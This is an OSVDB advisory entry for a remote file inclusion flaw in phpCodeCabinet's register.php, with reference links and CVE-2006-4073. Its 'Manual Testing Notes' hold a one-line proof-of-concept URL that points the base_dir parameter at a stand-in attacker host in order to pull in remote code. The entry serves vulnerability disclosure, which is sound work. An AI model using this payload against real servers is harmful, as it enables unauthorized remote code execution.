phpCodeCabinet (phpCC) register.php base_dir Variable Remote File Inclusion

2006-08-06T04:11:24
ID OSVDB:29102
Type osvdb
Reporter OSVDB
Modified 2006-08-06T04:11:24

Description

Manual Testing Notes

http://[target]/register.php?base_dir=http://evilcode

References:

Related OSVDB ID: 29101 Related OSVDB ID: 29100 Other Advisory URL: http://www.solpotcrew.org/adv/solpot-adv-05.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0105.html Keyword: SolpotCrew Advisory #6 ISS X-Force ID: 28259 Generic Exploit URL: http://www.milw0rm.com//exploits/2134 FrSIRT Advisory: ADV-2006-3199 CVE-2006-4073 Bugtraq ID: 19376